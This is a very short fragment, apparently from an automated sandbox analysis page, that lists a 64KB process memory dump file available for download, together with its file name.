
Download
memory/4284-228-0x00000000054A0000-0x00000000054B0000-memory.dmp

Filesize
64KB

Download